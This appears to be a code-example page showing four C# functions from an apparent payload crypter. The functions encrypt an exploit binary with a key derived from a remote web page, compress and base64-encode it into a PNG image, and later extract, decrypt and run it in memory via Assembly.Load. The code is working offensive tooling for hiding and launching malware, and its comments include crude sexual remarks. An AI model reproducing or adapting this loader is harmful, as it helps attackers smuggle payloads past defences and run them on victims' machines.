예제 #1
0
        public static byte[] stub_launch(byte[] url_data, string enc_pass, int png_offset, int pass_offset)
        {                                                                              // this was NOT easy.
            Byte[] salt          = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 }; //change
            Byte[] b64_data_only = new Byte[url_data.Length - png_offset];
            Buffer.BlockCopy(url_data, png_offset, b64_data_only, 0, url_data.Length - png_offset);
            Byte[] comp_data = base64_decode(b64_data_only);
            Byte[] enc_data  = decompress_bin(comp_data);
            int    nn        = enc_data[0] + (enc_data[1] << 8);

            Byte[] enc_pre_pass = new Byte[nn];
            Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
            Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
            Byte[] url_pass           = Enc.depadit(decrypted_url_pass);
            int    enc_data_offset    = enc_pre_pass.Length + 2;
            String nurl = Encoding.UTF8.GetString(url_pass);

            Byte[] enc_page; if (test_file(nurl))
            {
                enc_page = File.ReadAllBytes(nurl);
            }
            else
            {
                enc_page = get_page(nurl);
            }
            Byte[] master_pass     = hash_page(enc_page, pass_offset);
            Byte[] pass            = new Byte[0x20]; Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
            Byte[] pass_4          = new Byte[0x10]; Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
            Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset];
            Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
            Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); //moneyshot
            return(decrypted_sploit_bytes);
        }
예제 #2
0
        public static byte[] decrypt_small_pass(String pass, byte[] data, byte[] salt)
        {
            var key = new Rfc2898DeriveBytes(pass, salt, 7195);//<--

            byte[] out_data = Enc.aes_decrypt(data, key.GetBytes(16), salt);
            return(out_data);
        }
예제 #3
0
            // lololol
            public static string marshal_my_file(byte[] sploit_data, String url_pass, String enc_pass, int offset)
            {
                Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
                debug_print("The orignal sploit data: {0}", sploit_data);
                Byte[] url_pass_data;
                if (test_file(url_pass))
                {
                    url_pass_data = File.ReadAllBytes(url_pass);
                }
                else
                {
                    url_pass_data = get_page(url_pass);
                }

                Byte[] bytesToBeEncrypted = new Byte[offset + sploit_data.Length];
                if (offset != 0)
                {
                    if (offset > url_pass_data.Length)
                    {
                        Console.WriteLine("Sorry your page is only {0} bytes long", url_pass_data.Length);
                        Environment.Exit(0);
                    }
                    // we also use the offset to add that many random bytes to the beginning..
                    Byte[] saltBytes = Enc.gen_random_bytes(offset);
                    for (int i = 0; i < saltBytes.Length; i++)
                    {
                        bytesToBeEncrypted[i] = saltBytes[i];
                    }
                }

                for (int i = 0; i < sploit_data.Length; i++)
                {
                    bytesToBeEncrypted[i + offset] = sploit_data[i];
                }
                // end offset stuff

                // encrypt the url now, as we need that.
                Byte[] url_pass_inbytes = Encoding.UTF8.GetBytes(url_pass);
                debug_print("The url_pass_inbytes: {0}", url_pass_inbytes);
                Byte[] url_pass_padded = Enc.padit(url_pass_inbytes);
                debug_print("The url_pass_padded: {0}", url_pass_padded);
                debug_print("The salt we are using {0}", salt);
                Byte[] encrypted_url_pass = Enc.encrypt_small_pass(enc_pass, url_pass_padded, salt);
                debug_print("The encrypted_url_pass: {0}", encrypted_url_pass);
                Byte[] master_password = hash_page(url_pass_data, offset);
                debug_print("The master_password/hash from url page {0}", master_password);

                // I HATE doing it like this but meh...
                Byte[] pass   = new byte[0x20];
                Byte[] pass_4 = new byte[0x10];
                Array.Copy(master_password, master_password.Length / 4, pass, 0, master_password.Length / 2);
                Array.Copy(master_password, master_password.Length / 8, pass_4, 0, master_password.Length / 4);
                debug_print("Password Is: {0}", pass);
                debug_print("The IV Is: {0}", pass_4);

                Byte[] encrypted_sploit_bytes = Enc.aes_encrypt(sploit_data, pass, pass_4);
                debug_print("Our encrypted file is: {0}", encrypted_sploit_bytes);

                // we COULD xor it here, but im not going to bother

                // we need to append the encrypted_url_pass, to our encrypted_sploit_bytes..
                // we could also come up with a nifty method here, for now its already to complicated and my head hurts....
                Byte[] all_encrypted = new Byte[encrypted_url_pass.Length + encrypted_sploit_bytes.Length + 2]; // 2 bytes for length

                // c++ lol incase its longer than 255, we need 2 bytes
                all_encrypted[0] = (Byte)(encrypted_url_pass.Length & 255);
                all_encrypted[1] = (Byte)(encrypted_url_pass.Length >> 8);
                // int url_length = all_encrypted[0] + (all_encrypted[1] << 8); // the reverse!

                Array.Copy(encrypted_url_pass, 0, all_encrypted, 2, encrypted_url_pass.Length); // start at 2
                Array.Copy(encrypted_sploit_bytes, 0, all_encrypted, encrypted_url_pass.Length + 2, encrypted_sploit_bytes.Length);

                debug_print("The size of all_encrypted {0}", all_encrypted.Length.ToString());
                debug_print("The url encrypted pass and data: {0}", all_encrypted);

                // assuming everything went well lets compress it
                Byte[] compressed_sploit = compress_bin(all_encrypted);
                debug_print("Our compressed file: {0}", compressed_sploit);

                String b64_sploit = base64_encode(compressed_sploit);

                debug_print("Our base64 file: {0}", b64_sploit);

                return(b64_sploit);
            }
예제 #4
0
            // test our final image to veryify its working!
            public static void test_everything(string output_file, string enc_pass, int offset, byte[] b64_test, string[] main_args, int code_position)
            {
                Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
                Console.WriteLine("We are debugging it to make sure everything works properly!");
                Byte[] enc_testdata = File.ReadAllBytes(output_file);

                //int pos = do_png(enc_testdata);
                //pos = pos + 37; // header length is 37
                int pos = code_position;

                Byte[] b64_data_only = new Byte[enc_testdata.Length - pos];
                Buffer.BlockCopy(enc_testdata, pos, b64_data_only, 0, enc_testdata.Length - pos);

                debug_print("TESTING, base64 data {0}", b64_data_only);

                Byte[] comp_data = base64_decode(b64_data_only);
                Byte[] enc_data  = decompress_bin(comp_data);

                // the length of the url, stored as Int16
                int nn = enc_data[0] + (enc_data[1] << 8);

                Byte[] enc_pre_pass = new Byte[nn];
                Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);

                Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
                Byte[] url_pass           = Enc.depadit(decrypted_url_pass);

                // the offset is our enc data minus the url
                int enc_data_offset = enc_pre_pass.Length + 2;

                String nurl = Encoding.UTF8.GetString(url_pass);

                // get file or webpage for encryption
                Byte[] enc_page;
                if (test_file(nurl))
                {
                    enc_page = File.ReadAllBytes(nurl);
                }
                else
                {
                    enc_page = get_page(nurl);
                }

                Byte[] master_pass = hash_page(enc_page, offset);
                debug_print("Our testing master_pass {0}", master_pass);

                // I HATE doing it like this but meh...
                Byte[] pass   = new Byte[0x20];
                Byte[] pass_4 = new Byte[0x10];
                Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
                Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
                debug_print("Password Is: {0}", pass);
                debug_print("The IV Is: {0}", pass_4);

                Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset]; // get ready for the money shot
                Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
                Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4);

                debug_print("Our encrypted file is: {0}", decrypted_sploit_bytes);

                Console.WriteLine("Everything should have worked, loading the binary.");
                // load the bytes into Assembly
                Assembly a = Assembly.Load(decrypted_sploit_bytes);

                // search for the Entry Point
                MethodInfo method = a.EntryPoint;

                if (method != null)
                {
                    // GlobalAssemblyCache <-- ????
                    // create an istance of the Startup form Main method
                    Object o = a.CreateInstance(method.Name);

                    // copy main_args into new array, to use in object
                    String[] prog_args = new String[main_args.Length - 1]; // adjust this if we use more args!
                    Array.Copy(main_args, 1, prog_args, 0, main_args.Length - 1);
                    try
                    {
                        // invoke the application starting point
                        method.Invoke(o, new Object[] { prog_args }); // all over her face
                    }
                    catch (Exception e)
                    {
                        Console.WriteLine(e);
                    }
                }
            }